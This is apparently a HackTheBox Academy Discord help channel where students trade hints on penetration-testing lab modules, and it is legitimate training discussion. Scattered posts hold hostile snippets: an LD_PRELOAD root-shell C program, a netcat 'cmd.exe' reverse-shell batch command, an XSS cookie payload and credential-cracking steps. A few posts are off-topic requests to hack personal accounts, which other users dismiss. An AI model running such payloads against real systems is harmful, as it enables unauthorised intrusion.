#modules

1 messages · Page 83 of 1

spark vector
#

only 3 - h.inlanefreight.htb, c.inlanefreight.htb and n.inlanefreight.htb. I might be missing one?

rustic sage
#

Yeah, those aren't the nameservers, dm me.

acoustic owl
fallow delta
#

Anyone free for a nudge on Attacking Common Application -> Attacking Thick Client Webapps. I am on the SQLi portion and successfully compiled the java program but its not displaying anything. I think the code snippet from the module broke the application for the invoker

thorn urchin
#

wdym not displaying anything

steady matrix
#

Hi all, could someone help me confirming the scope for AD Enumeration & Attacks - Skills Assessment Part II? Does "full-scope" mean whole network (so /16 would be allowed for instance), or is it limited to something more specific?

misty drift
#

thank you !!!

charred sinew
#

can anyone help me hack my old roblox account is want it back so bad ngl

valid osprey
#

Hey guys. I am doing only 28 pentest modules in preparation for CPTS, and I was confused about the PASSWORD ATTACKS - Credential Hunting in Windows laboratory where I have to get the WinSCP credentials, there is a tip that is to download a tool (which in lab says which it is), but the issue is that the target machine does not have internet access.

Can anybody help me ?

acoustic owl
fathom pendant
dense turret
#

guyz iam new here

raw venture
#

Module: Footprinting
Hi, anyone here finished the Section: Footprinting Lab - Easy without using bruteforce tool? I got the flag but I'm thinking if there is another option to solve it or it is the intended way.

thorn urchin
raw venture
#

Footprinting Module

lilac halo
#

hello, i have question with AD Enumeration & Attacks - Skills Assessment Part II question 10 :+ 1 Crack this user's password hash and submit the cleartext password as your answer. i found CT*** user via bloodhound but i cant get user hash .

karmic wren
#

Thank you it was helpful!!!! That’s why think out of the box.

naive wadi
#

so, I am doing the footprinting easy lab

#

and I am unsure if this is a firewall issue on my part or something else but when connected to ||ftp|| with the correct creds I got from the ||header|| + ||bruteforcing|| I cannot get a list I constantly get this message: || 229 Entering Extended Passive Mode (|4916|) 150 Opening ASCII mode data connection for file list|| I have tried via ||web-browser|| and via ||wget|| but unsure of where I am going wrong

#

can someone point me in the right direction?

#

Oh have also tried the above on the pwn box too so no idea

fathom pendant
naive wadi
fathom pendant
#

No

naive wadi
#

hmmm

fathom pendant
#

What does your command and output look like?

#

Also are you able to ls/ get files ones you're in ftp

naive wadi
#

nah

#

I can't

#

||┌──(kali㉿kali)-[~/Desktop/Tmp] └─$ ftp 10.129.215.171 21 Connected to 10.129.215.171. 220 ProFTPD Server (ftp.int.inlanefreight.htb) [10.129.215.171] Name (10.129.215.171:kali): ceil 331 Password required for ceil Password: 230 User ceil logged in Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 229 Entering Extended Passive Mode (|||5449|) 150 Opening ASCII mode data connection for file list 226 Transfer complete||

#

Same when I use pwnbox btw

#

even tried this

autumn pilot
#

there is a non-default port

naive wadi
#

I know, but I am getting the same errors

long grove
#

@naive wadi wget -m --no-passive ftp://[user]:[pass]@white rock:2121

naive wadi
#

I did, that, figured it out now.

#

Thanks

#

I was honestly being really stupid out of frustration

final maple
#

Hi, Do you think you can help me out with this? I read the thread and am stuck at the same place. Thanks!

fathom pendant
#

check other subdomains

turbid ledge
#

Hello, i need help in linux privilege escalation, i'm exploiting LD_PRELOAD environment variable.

#

Script i'm using is
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

#

Error i'm receiving is warning: implicit declaration of function 'setgid' [-Wimplicit-function-declaration]

devout osprey
#

Hey, need help, I have a problem with netcat on listening to the port 4444 in the unified machine, I tried to change the port of the Shell but it didnt work

rustic sage
#

Hi someone can help me in OSINT: Corporate Recon module? What is the email address for enterprise customer support?

autumn pilot
#

check the hint

pure cedar
#

Hello my friends, how are you all? I hope the sun is shining wherever you are.

I seem to be having some difficulties with finding public exploits for OpenSSH 8.8 (protocol 2.0) for the "Getting Started: Public Exploits" module. The hint is sending me towards "plugin exploits" but I cannot seem to find any through conventional means. Some help would be much appreciated Sad_Squidward_Pepe

thank you all

empty fog
#

Hello. Please, someone can help me with question "Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host." in "AD Enumeration & Attacks - Skills Assessment Part II" section? I noticed that C**** has the ||DS-Replication-Get-Changes|| and the ||DS-Replication-Get-Changes-All|| privilege, but I fail abuse this privilege. I already RDP in MS01. I'm on good track?

EDIT: solved ✅

zinc sentinel
pure cedar
#

I managed to get the flag by using scanner/http/wp_simple_backup_file_read exploit through metasploit

#

using the method displayed in lesson didn't work

zinc sentinel
pure cedar
#

oh i thought you meant the actual exploit the lesson uses

#

my bad

zinc sentinel
#

All good.
It's a decent primer to prepare for alot of out of the box thinking

crisp remnant
#

Can anyone assist a bit with the http attacks module ?

modern hill
#

Surely the response to question 2 in Preparation Stage (Part2) of Incident Handling Process is a mistake from the makers?

rustic sage
#

Having an issue with this myself.

I keep getting back strings of 33 or 31 characters.

#

Could use help on it if anyone's got time

inner talon
#

Hello guys, do u can help me with this question " Where is the Laudanum aspx web shell located on Pwnbox? Submit the full path. (Format: /path/to/laudanum/aspx)"? I found both paths ||/usr/share/webshells/laudanum/aspx and /usr/share/laudanum/aspx but neither of the 2 is correct. ||I tried entering the path under useful as well but that wasn't even the correct answer. I have completed all the exercises in the module but cannot find the answer to this question.

autumn pilot
#

don't forget to include the name of the file

fathom pendant
#

@narrow solar do this: ls -la when in the ftp server

narrow solar
#

already tried it

#

still empty

autumn pilot
#

perhaps you are looking at the wrong ftp server

narrow solar
thorn shale
#

hey, can anyone help me with Password Attack easy lab? I read earlier messages about it and didnt found any hints for me
I connected by m*** via ssh and tried a lot of but didnt get something interesting
i will be glad to see you in my private messages

fathom pendant
#

If you didn't find anything interesting you weren't looking hard enough.

thorn shale
#

what should I to do with what I found?

smoky viper
#

Can someone please help with Footprinting lab-hard
I've successfully ssh into the box as user T. Ls -a shows all the hidden files and mysql gives a hint. I tried loggin with the credentials I have but it still failed. Found a second user and used the same password, failed too. Any hints?

long grove
#

Attacking Common Services (Attacking DNS)
I use subbrute for subdomains 1. [echo “targetIP” > ./resolvers.txt] 2. [python subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt ] and than i checked each subdomain listed with dig axfr @10.129.198.103 helpdesk.inlanefreight.htb. am i doing anything wrong?

thorn shale
#

very basic

zinc sentinel
#

Nice one 👊

limber widget
smoky viper
#

Can someone please help with Footprinting lab-hard
I've successfully ssh into the box as user Tom. Ls -a shows all the hidden files and mysql gives a hint. I tried loggin with the credentials I have but it still failed. Found a second user and used the same password, failed too. Any hints?

plain coral
true arrow
#

Hey Bro I need a help

cyan ginkgo
#

the question What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word) in ACL Enumeration i used bloodhound and found 2 OAT but it isn't correct can someone help me

limber widget
#

How does that have anything to do with HTB academy?

glacial hazel
cyan ginkgo
#

@limber widget indeed it is a module so it has everthing to do with htb Academy

glacial hazel
#

get rekt

glacial hazel
#

from someone else

#

it was unrelated

cyan ginkgo
proper pier
#

hello. it seems embarassing, but what is the password for the pwnbox's user? just got my Student subcription and trying "Attacking common services", FTP labs works like a charm without superuser permission, but smb lab asks for it. For first though i think the pwnbox is like the GCP, using publickey but seems not.

#

okay, got it. the credential file on desktop is hidden because the screen is too small. i

zinc marsh
#

need a hint in sqlmap essentials - skill assessment

#

please

acoustic owl
river skiff
zinc marsh
thorn urchin
#

figure it out

#

nobody's gunna just give you the flag lmao

fallow delta
#

currently trying to download the fatty-server.jar^

thorn urchin
#

ah so youre a little before the SQLi portion technically

#

I would try redoing it because you might've had a typo

lament lance
#

I'm struggling to run 7z2john.

#

Ok managed to run it but now I'm struggling to identify it..

fallow delta
zinc marsh
#

Someone who did XSS module?

thorn urchin
zinc marsh
#

am doing ||<script>alert(document.cookie)</script>|| in the stored xss section

#

and is not working

thorn urchin
#

try looking at the source code and seeing where it's breaking to not execute

#

there may be some tags you have to close out of

zinc marsh
#

it is supposed to be like that

#

i think i disabled the alerts

#

how can i activate them back?

heady tusk
#

just to make sure, you're hitting enter to submit the payload?

zinc marsh
#

lol

long grove
#

Attack common services (Attack SQL Databases)

[] Encryption required, switching to TLS [] ENVCHANGE (DATABASE): Old Value: master, New Value: master

[*] ENVCHANGE (LANGUAGE): Old Value: New Value: us_english

[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192

[] INFO(WIN-02\SQLEXPRESS): Line 1: Changed database context [] INFO(WIN-02\SQLEXPRESS): Line 1: Changed language setting to us_english.

to 'master'.

[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)

[!] Press help for extra shell commands SQL> select name from master.dbo.sysdatabases

name

master

tempdb

model

msdb

hmaildb

flagDB

SQL> select table_name from flagDB.information_schema.tables table_name

tb_flag

SQL>

What command would I use to read the tb_flag?

zinc marsh
#

maybe the database

#

flagDB?

#

lol

heady tusk
#

well select the database and then just select *

#

nothing fancy needed here

zinc marsh
#

select * from tb_flag;

heady tusk
zinc marsh
zinc marsh
zinc marsh
heady tusk
#

ah okay

long grove
#

@zinc marsh Thanks

rustic sage
zinc marsh
#

and i have done all in kali

#

except the MacOS fundamentals that u need MacOS

long grove
long grove
rustic sage
rustic sage
fallow delta
thorn urchin
#

it used to be worse lol

#

its also not on the CPTS exam

heady tusk
zinc marsh
#

just go to google and search for a cheatsheet for mssql

#

||```SELECT * FROM flagDB.dbo.tb_flag;

#

should be something like that if im right

autumn mirage
#

can someone help with first task in LOGIN BRUTE FORCING Skills Assessment - Service login ?

heady tusk
zinc marsh
#

he is not using the flagDB databse then

zinc marsh
heady tusk
#

that's what I was already suspecting, yeah

#

fair

zinc marsh
#

anyway just use google or chatgpt @long grove

zinc marsh
#

i finished it yesterday lol

quasi wave
#

hi I am stuck in this wireshark exercise and need some help. This is the Intro to Network Traffic Analysis section

#

hold on a sec

rotund urchin
#

has anyone recently completed the password attack section and module Pass the Ticket (PtT) from Linux

#

its not accepting my answer for julio's flag

#

nor is the question/answer correct on the module it seems

lethal atlas
#

I have completed that module but all of my notes were lost. 😦

quasi wave
#

the question asks " What was the filename of the image that contained a certain Transformer Leader? (name.filetype) ?" I found the other answer in the section ezpz

#

this is the Packet Inception, Dissecting Network Traffic With Wireshark section

#

I keep looking for stuff in the packet capture and nothing comes up

#

I mean it does

#

there's traffic

#

but I can't find the specified http packet

lament lance
lethal atlas
quasi wave
#

there's a bunch of HTTP 200 OK packets but how do I know which one corresponds to the right GET request

quasi wave
thorn urchin
thorn urchin
#

but also idk of hashid works for those file hashes anyways

rotund urchin
quasi wave
#

the problem is I can't figure out which HTTP 200 OK packet is also an ACK cuz it doesn't say "ACK" on any of the HTTP 200 OK packets

lethal atlas
thorn urchin
#

never bothered trying, just plugged it into john

lament lance
#

So how do I identify it?

#

I need to hashcat it

#

So I need to know the mode

quasi wave
#

all ACK packets are labeled so its hard to figure out how to just filter for that

#

like for HTTP 200 OK codes that are also ACKs

thorn urchin
lament lance
#

wym?

thorn urchin
#

Im saying if you want to use hashcat instead of john to process an X2john result then youre pretty much on your own to research it. Should just use john

#

can read the 7z2john script to glean information or google about how 7z archives password protections work

quasi wave
#

the question is "what is the filename of the image that contained a certain Transformer leader"

#

but without finding the HTTP 200 OK that is acknowedging a user's GET request I won't find it I'm pretty sure

thorn urchin
#

also just googling 7z hashcat and the very first result explains how to do it with hashcat

quasi wave
#

hi is anyone able to help me?

heady tusk
lament lance
quasi wave
#

hi is someone gonna help or should I go elsewhere?

#

what do you think?

lethal atlas
thorn urchin
lethal atlas
#

I sent a screen shot of the directions

quasi wave
#

ok sorry

#

ok hold on

thorn urchin
#

just cause you dont get an answer in .5 seconds doesnt mean you should cry about, clearly I at least am in the middle of helping someone else

quasi wave
#

ok sorry I am just impatient because of how frustrated I am at this challenge I have been trying to solve. I should have been more patietnt.

thorn urchin
lethal atlas
#

OMG I just recovered my lost notes

#

thank you icloud

lament lance
thorn urchin
#

Havnt done that module. Id imagine they have instructions on how to retrieve the appropriate hash for hashcat and the mode to use

thorn urchin
#

if not, use john anyways or google as I mentioned.

thorn urchin
lament lance
#

so use 7Z?

thorn urchin
#

if that's what the file is

lethal atlas
#

@quasi wave dm me and I will help you in detail

#

there are multiple ways to find the answer and they are simple.

zinc marsh
#

@lament lance hash identifier

lament lance
#

wym?

#

tried that

#

gave mesome weird cisco hash

zinc marsh
thorn urchin
#

You dont need to ID it lol

lament lance
#

7Z hash not working

zinc marsh
#

with hascat

thorn urchin
thorn urchin
lament lance
#

oh now it is

#

but its way too slow

#

let me run it on my host machine

#

nvm

#

it got cracked in the pwnbox

zinc marsh
#

11600 7-Zip

thorn urchin
#

🙂

lament lance
#

thanks guys

thorn urchin
#

np

#

when it doubt always read the section again!

lament lance
#

it was the first thing i tried but it looked like its not running so i assumed its wrong hash

robust tangle
#

hey guys can someone help me with Client-Side Validation/ file upload

thorn urchin
#

just remember in the real world things are rarely as fast lol

#

I spent a week trying to crack a hash I was working on and in the end it just wasnt doable

lament lance
thorn urchin
#

all cracking is a bold claim

#

some things are simple done properly and the heat death of the universe isnt enough to crack it

zinc marsh
hardy socket
#

hey everyone, need some help with Attacking Passwords module, section Passwd, Shadow & Opasswd. Is there a kind soul that will lend me a hand?

heady tusk
hardy socket
thorn urchin
#

its a good read for asking better questions

hardy socket
#

Guys I'm working through Passwd, Shadow & Opasswd section in Attacking Passwords, and I cannot find a way to hack the SHA-512 hashes from the /etc/shadow file. Can someone help me out please?

lethal atlas
#

@hardy socket what wordlist are you using?

hardy socket
lethal atlas
#

try using the mut password list

hardy socket
lethal atlas
#

DM me

hardy socket
zinc marsh
#

someone i can ask 1 thing about xsstriker?

rustic sage
#

Hey!!

static roost
#

#Module: Documentation & Reporting
#Section: Notetaking & Organization
#Sub-section: Evidence

Can anyone help me figure out how to link a directory tree on my file system to obsidian. It's mentioned in the above sections. But doesn't explain how.

rustic sage
#

Can someone please help me

lethal atlas
thorn urchin
#

Ive used it so many times in this channel I could practically type it blindfolded.

lethal atlas
#

Had to block Ichi. He was wanting someone to help him hack whatsapp

thorn urchin
#

maybe a little less than a quarter of people actually read it.

lethal atlas
#

I would if he had asked here in public.

#

eh, just blocked him so he cant dm me anymore. If he is dumb enough to ask here he can get banned. Or I could

#

<@&861185840277487616> @obtuse wigeon

west rampart
thorn urchin
#

he was originally soliciting people in this channel

west rampart
#

No. Just dm a mod

thorn urchin
#

but yeah he shoulda DMd

#

cool tell me about it in a relevant channel lol

rustic sage
#

What filter will allow me to see traffic coming from or destined to the host with an ip of 10.10.20.1?
||ip.addr|| ? hackthebox keeps refusing my answer

glacial hazel
#

Google

zinc marsh
#

||tshark -i <interface> host 10.10.20.1|| this one if it is in real time

rustic sage
zinc marsh
#

but yeah google answers all ur doubts

shadow rose
#

#Module: FOOTPRINTING
#Section: Host Based Enumeration
#Sub-section: DNS

last qustiion: which domain names list should i used -- while am trying to burfurcing the subdomain?

acoustic owl
shadow rose
acoustic owl
#

use the smallest list

shadow rose
#

ok .. i will try

#

i start brute-forcing using the following list subdomains-top1million-5000.txt

acoustic owl
#

use the smallest list

midnight sluice
#

where do I post support questions?

shadow rose
acoustic owl
zinc marsh
midnight sluice
#

Hey, just starting out and wanted to try the free tier before I pump my $$ into this. Trying to get the flag for the first mod (HyperText Transfer Protocol (HTTP)). I have the correct command curl -s -O http://[IP ADDRESS]:[PORT#]/download.php. For some reason the file is not downloading and I don't know what I'm doing wrong!

zinc marsh
#

or started a pwnbox

midnight sluice
#

@zinc marsh I'm working the first module in htb Academy, I just went to the bottom of the page and clicked the start machine button and then started the target ip listed below that

zinc marsh
#

and did u run the command?

acoustic owl
#

But without the name of the module I can only guess

midnight sluice
#

@zinc marsh @acoustic owl the module is HyperText Transfer Protocol (HTTP) in the Bug Bounty Cert

zinc marsh
#

i guess the module is web requests

#

since it is the first

#

i got it

zinc marsh
shadow rose
#

-0 {put the file name } output filename

zinc marsh
#

but he doesnt need to download anything to get the flag

zinc marsh
#

and try the curl command u think is right

acoustic owl
zinc marsh
#

but read first what each command does in curl

zinc marsh
midnight sluice
#

I'm 90% positive my syntax is correct, I even watched tutorial where the person used the same syntax and got he answer

zinc marsh
#

even if u want to download the file the flag is -o

#

||curl -s -o <file> IP:PORT||

midnight sluice
#

@zinc marsh Let me try that...the instructions and cheat sheet say curl -s -O inlanefreight.com/index.html

#

Shhot....I'll have to do it tomorrow, my machine timed out it looks like

zinc marsh
#

as i told curl -h

#

to read the commands

#
 -d, --data <data>          HTTP POST data
 -f, --fail                 Fail fast with no output on HTTP errors
 -h, --help <category>      Get help for commands
 -i, --include              Include protocol response headers in the output
 -o, --output <file>        Write to file instead of stdout
 -O, --remote-name          Write output to a file named as the remote file
 -s, --silent               Silent mode
 -T, --upload-file <file>   Transfer local FILE to destination
 -u, --user <user:password> Server user and password
 -A, --user-agent <name>    Send User-Agent <name> to server
 -v, --verbose              Make the operation more talkative
 -V, --version              Show version number and quit

This is not the full help, this menu is stripped into categories.
Use "--help category" to get an overview of all categories.
For all options use the manual or "--help all".```
midnight sluice
#

k...let me try that!

zinc marsh
#

me

#

yea

#

yea

#

if u want output just -o file

midnight sluice
#

@zinc marsh well, I thank you for your help, I'd been smashing my head for hours on that

acoustic owl
#

Please delete this message.
Flags are not allowed to be posted.

midnight sluice
#

@acoustic owl What an idiot! Sorry, thanks for the headsup

acoustic owl
#

No problem 🙂

acoustic owl
zinc marsh
#

oh okey was him

#

i hadnt read it

acoustic owl
#

sure

rustic sage
#

I have made it to around 19 modules so far, if anyone needs assistance with the ones listed in the image, DM me.

zinc marsh
#

i have done these one if someone need help in any of them:

thorn urchin
#

I find it best to just pick and choose to help people in chat.

#

Random DMs are a great way to lose brain cells

zinc marsh
rustic sage
#

@zinc marsh Do you plan to do any pro labs before the actual exam?

zinc marsh
#

while im making the weekly machines

rustic sage
#

Oh right, that's a very long journey

#

Good luck

fickle thicket
acoustic owl
zinc marsh
fickle thicket
#

so what's the date you started? do you take down notes?

#

i am so impressed

zinc marsh
#

when they run out i will move to the retire machiens and challenges

#

and will keep buying the modules i can monthly with the platinum sub

fickle thicket
#

sounds fun

zinc marsh
fickle thicket
zinc marsh
acoustic owl
zinc marsh
#

@fickle thicket i started from zero like 5months ago

fickle thicket
#

when will htb academy introduce python scripting. there's only bash scripting rn

zinc marsh
#

but i started in tryhackme and then i moved here

#

i came to hackthebox when i finished all the paths in tryhackme

zinc marsh
jaunty lodge
zinc marsh
#

but yeah i told in suggestions to add more modules for bash and python

rustic sage
fickle thicket
#

tryhackme🤣 i find it hard to rmb stuff when i study in thm. is hard to rmb things without pain

i came from offsec learn fundamentals and found it better than thm then i saw htb academy and found it even more comprehensive than learn fundamentals🤣🤣🤣🤣

zinc marsh
#

for me was easier in thm

#

for fundamentals

#

well see ya am going to start web proxies

jaunty lodge
zinc marsh
#

@acoustic owl do u prefer burp suite or zap

rustic sage
zinc marsh
lavish needle
#

Can anyone assist me w/ server-side attack module - Nginx Reverse Proxy & AJP section? I believe I've done everything correctly but when I go to curl the target - I get a "(28) Failed to connect" or a "(52) Empty reply from server."

zinc marsh
acoustic owl
#

Everyone here started from scratch. That is quite normal

zinc marsh
#

we all started from zero

#

am still just a script kiddie

blissful plank
#

Hey I'm on the getting started module and im stuck on the thrid question for the user bob password. I have tried to use the password they have and many others but I cannot access the user. Can I get some guidance?

tidal mango
blissful plank
#

third question

#

tried the password that they have but it didn't work

#

$ smbclient -U bob \\10.129.225.61\ users
Password for [WORKGROUP\bob]:
do_connect: Connection to failed (Error NT_STATUS_NOT_FOUND)

#

I cannot attach a screenshot i do not have permissions yet

acoustic owl
tidal mango
tidal mango
fathom pendant
#

Their error is most likely the space between the slash and users as the error is a NT status error

#

And not the "not enough \ error

tidal mango
#

doh! it escaped them 🤦‍♂️

fathom pendant
#

:) discord formatting be funny

#

But yes both work

tidal mango
fathom pendant
#

:D

#

I prefer the forward slashes to avoid headaches

tidal mango
radiant marten
#

Can anyone help me with the Intro to Assembly procedure module wherein you are to find the 0xaddress without zeros on the top of the stack once you enter Exit.. This is right after creating the loop function... I'm quite lost I guess

heady geyser
#

need a nudge for "password attacks lab easy". able to ssh in as M*** but unable to escalate to root from there. thank you.

tidal mango
heady geyser
long grove
#

ATTACKING COMMON SERVICES (Attacking SMB)

Qustions: Login as the user "jason" via SSH and find the flag.txt file. Submit the contents as your answer.

┌─[eu-academy-2]─[10.10.15.190]─[htb-ac-624665@htb-o92gf8gizh]─[~]
└──╼ [★]$ ssh jason@10.129.109.29
The authenticity of host '10.129.109.29 (10.129.109.29)' can't be established.
ECDSA key fingerprint is SHA256:3I77Le3AqCEUd+1LBAraYTRTF74wwJZJiYcnwfF5yAs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.109.29' (ECDSA) to the list of known hosts.
jason@10.129.109.29: Permission denied (publickey).
┌─[eu-academy-2]─[10.10.15.190]─[htb-ac-624665@htb-o92gf8gizh]─[~]

Why doesn't SSH login?

autumn pilot
#

because you need a key

#

can you verified if the machine has actually spawned?

long grove
thorn urchin
#

Working on the Attacking Enterprise Networks module and I have the SSRF into LFI on one of the domains, but I cant find where the actual flag for the associated question is supposed to be.

thorn urchin
#

nvm got it

#

one of my guesses that was error 502 was actually right and I just had to re guess it for the 5th time before it gave me the correct result.

thorn shale
#

Is anyone can help with Medium Lab - Password Attack?
Thats strange, but I really cant understand what I should to do next
||I used creds from easy lab (user m***) and auth to smb to get archive. Cracked that archive and docs file inside. That gives to me some combintation of numbers (9....)...so when I tried to open docs file - I had seen encrypted symbols. How should I used the password from docs or what the hell is this xD ||I really cant understand how to solve this lab
Can you please show me the right way? DM me please

wooden palm
#

I have this in the getting started knowledge check. I've tried to run a php reverse shell using sudo with it, but it just spat the code of the file back out at me and nothing happened.

#

Just as a sanity check: "sudo /usr/bin/php revshell.php" will in fact run as root right?

#

Nvm got it to work.

vestal coral
#

Hello

#

Can anyone help me with PC season machine

#

I’m stuck in this unknown port

#

Found exploit for default credentials but don’t know how to authenticate

devout osprey
#

Does anyone know what to do with error: unable to select packages: doas (no such package) while I have it already installed?

#

Solved already

summer lava
#

I need some help here pls i found the directory for no flag.txt in there

ATTACKING COMMON APPLICATIONS  ==>  WordPress - Discovery & Enumeration
-------------------------------------------------------------------
vHosts needed for these questions:
blog.inlanefreight.local
 Enumerate the host and find a flag.txt flag in an accessible directory.
------------------------------------------------------------------------
autumn pilot
#

Directory listing is enabled

zealous dew
#

how i can gain more points only throygh buy credits?

autumn pilot
#

what kind of points are you looking for

zealous dew
#

i got new account

#

i want to watch wordpress and brute forcing passwords

autumn pilot
#

if you are referring to academy, then you need cubes which you can get either with a subscription or a one time payment

zealous dew
#

thank you

zealous dew
#

is it worht it to be honest? i try some vixeos from youtube withpput any real effect

summer lava
proud pine
devout osprey
#

can anyone help me reach out why this code: ||echo C:\Log-Management\nc64.exe -e cmd.exe 10.10
.14.18 1337 > C:\Log-Management\job.bat|| is not working?

#

sorry it works but nc does not reach this port

#

But pls help

summer lava
rustic sage
#

guyz

#

hack my wifi router

#

its not working

#

Hello colleagues, I can't find this question as such
What is the type of the service of the "syslog.service"?

#

Linux fundamentals

slender steppe
#

Upload Exploitation
Try to exploit the upload feature to upload a web shell and get the content of /flag.txt

#

which dir

#

i can get the shell but not able fine the flag

#

checked all the dir

#

any hint?

acoustic owl
slender steppe
#

yes have check that but not there

toxic bane
#

hey guys can you help me with the PC machine?

unique valve
toxic bane
#

i dont have access to that

toxic bane
acoustic owl
rustic sage
trail badge
#

Hey guys,
according to SQL Fundamentals module / Union Clause section, the statement "SELECT <number> from <table_name>" returns the given number as column name and as a value for every row in the specified table. Why does this work exactly?
I would expect an error here because a column named <number> doesn't exist. At the same time, <number> might be interpreted as a number and not as a string here... :/

rustic sage
#

@acoustic owl when i purchase the plan that is 7 euro on month, when i unlock some section from job path can i still continue the section when the plan is expired

zinc marsh
#

using web proxies - skill assessment - Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload) i think im doing it right but im not able to get the flag

granite shuttle
#

In the Footprinting module under SNMP there is a task to "Enumerate the custom script that is running on the system and submit its output as the answer.".
|| Is there any more to it than just running snmpwalk? I found it, but it seems implied that there is a way to target the script itself. Yet snmpwalk kinda just spat it out on its own. || I just wanna make sure I'm not missing out on something they meant to teach.

small sage
#

Any hints for the last hop in the pivoting skills assessment?

heady tusk
heady tusk
sleek urchin
#

Doing Pivoting, Tunneling, and Port Forwarding:Web Server Pivoting with Rpivot and I have got a connection, yet the web page hangs and i get this error The server at 172.16.5.135 is taking too long to respond.

#

any help is appreciated

heady tusk
acoustic owl
heady tusk
heady tusk
heady tusk
#

great 🙂
What was the issue?

sleek urchin
#

the issue was I was trying to open firefox with proxychains while it's already open, so i closed firefox and launched it again with proxychains and the connection was established

heady tusk
#

yeah that woulda been my next guess. I ran into the exact same problem

cedar gull
#

hello folks, I'm stuck on the skills assessment for the module CRACKING PASSWORDS WITH HASHCAT. I need to crack the ntds file hashes but I guess that trying to do one hash at the time is not the best way. Is there anyone that ended this module and may helps?

ivory sandal
#

Hey guys, can someone give me a nudge of the Nmap hard lab? I found ||3 open ports: 22, 80 and 50000 and a filtered FTP port 990||. I tried connecting with ||ncat -nv --source-port 53 10.129.128.219 <port> to ports 50000, 22 and 990|| but it all gave timeouts.

cedar gull
#

yes but there are 1005 hashes in the list to hack

#

ok i'll check this out Moo

#

thanks

#

it's the last question. I already accomplished the rest of the test.

#

I contact you in dm Moo, for not spamming around

#

if it's ok for you

#

ok, I'm gonna try that

#

thanks

fallow delta
#

If anyone happened to finish the Common Applications - Attacking Web Thick-Client Applications section could I DM you regarding the part where we modify the Invoker.jar to download files

cedar gull
#

thanks Moo! I'll try that

waxen kayak
#

anyone have a good method to bulk download tools from one host to another? one of the most annoying things I've found so far is having to move tools around a bunch. I've pretty much just resorted to keeping the curl command in notes. but still a bit annoying.

faint rampart
waxen kayak
#

I suppose that works for just "single hop" scenarios. actually would work nicely. the most annoying this for me is when pivot hosts are involved. then it's like ok.... put files on the pivot then to the target but make sure you got another shell and method to serve up those files

#

tedious I guess is what I mean.

heady tusk
#

well if you have a solid pivot running over multiple hosts with like chisel or something, you can directly copy to target without copying to all hosts in between

#

like you can run proxychains scp /path/to/tool user@TARGET_IP:/home/user for example

ivory sandal
#

Hey guys, can someone give me a nudge of the Nmap hard lab? I found ||3 open ports: 22, 80 and 50000 and a filtered FTP port 990||. I tried connecting with ||ncat -nv --source-port 53 10.129.128.219 <port> to ports 50000, 22 and 990|| but it all gave timeouts. Can I dm anyone for help?

fathom pendant
rustic sage
#

I'm stuck on the Firewall and IDS/IPS Evasion - Medium Lab :- nmap -sSU -A -sV -p 53 10.129.2.48 used this command . anyone can help me ?

heady tusk
#

||that command should work. recheck your output||

ivory sandal
fathom pendant
#

Well then try a different port

#

:)

#

Remember all netcat is doing is connecting to a port. If it's open, it'll connect and give you a banner

ivory sandal
wraith delta
#

Find the existing exploit in MSF and use it to get a shell on the target. What is the username of the user you obtained a shell with?

#

Anyone can help me with this in sessions and jobs section of MSFconsole module

fathom pendant
#

The module should tell you how to check the user you are

wraith delta
#

There are like 1000 differnt vulnerabilities on the system i have no clue which one to exploit

fathom pendant
#

I don't recall it being that difficult. Those vulns look like they relate to ssh. Which in that case you're looking in the wrong direction

wraith delta
#

are u trying to say theres a different port?

fathom pendant
#

There should be iirc

wraith delta
#

i hate full scans they take so long thats why

#

alright ill check

fathom pendant
#

Just do a regular scan first

wraith delta
#

I did

#

same ports open

#

i just did a scan with the NSE --scirpt vuln

fathom pendant
#

Well look at the ports: the script output can really mess up what you see

rustic sage
wraith delta
#

I dont think i remeber very well but

#

try with -A

rustic sage
#

tried doesnt work

wraith delta
#

itll work for the hard

#

i dont remeber

#

for medium

fathom pendant
#

Hard doesn't need -A

wraith delta
#

If u dont do -A it wont show the /spoiler

#

||robots.txt||

heady tusk
fathom pendant
#

It's a slippery one

quasi wave
#

hi guys

#

I'm still having trouble with the Packet Inception, Dissecting Network Traffic With Wireshark section of Intro to Network Traffic Analysis module

#

can someone help me out here?

#

I try to export objects to http but the http option is greyed out

rustic sage
quasi wave
dapper relic
#

I'm stuck in Linux fundamentals - Navigation questions What is the name of the hidden "history" file in the htb-user's home directory? && What is the index number of the "sudoers" file in the "/etc" directory? I used ls -i too see index number, I get the index number but the questions won't except

cedar gull
#

just took the flag! I really suggest you to use the ruleset OneRuleRuleThemAll and the wordlist rockyou!

autumn pilot
#

You are asked for Bob's password

broken onyx
#

Hi

#

How do we start to work what is the website

plucky imp
#

I have a university account and the university subscription cannot be activated

thorn urchin
#

your uni probably isnt on their automatic verification list, but if you talk to support they can adjust you in if its appropriate to do so

plucky imp
thorn urchin
#

green bubble in the corner, disable adblock if you have it

plucky imp
#

oky

thorn urchin
#

Its there for me

#

did you disable adblock

quasi wave
#

solved it I was using wrong file

#

lmao

plucky imp
plucky imp
thorn urchin
#

he wasnt talking about you 😂

#

theres not a link, you gotta go through the chat bubble

plucky imp
#

not found

#

Help Center

#

or not

thorn urchin
#

support bubble is on the help site too

#

dm screenshot of your browser

plucky imp
thorn urchin
#

👍

plucky imp
lament lance
#

I'm struggling with the " Extract the PMKID hash from the attached .cap file and crack it. " question on cracking WPA handshakes section of hashcat module. When i try to run the file through hashcat, I get this:

thorn urchin
brave sail
#

What's the command for installing python 2.7?

fathom pendant
#

should just be
sudo apt install python2

spark iris
#

sudo yum install python27 if u have red hat

#

btw guys is there any like small groups where u can join to study together etc?

rustic sage
#

guys any alternative to windows os ?

#

i can run steam, .exe stuff, and etc

#

like windws

#

windows*

fathom pendant
fathom pendant
fathom pendant
#

Your question is not related to this channel

#

Simple as thar

zinc marsh
zinc marsh
rustic sage
#

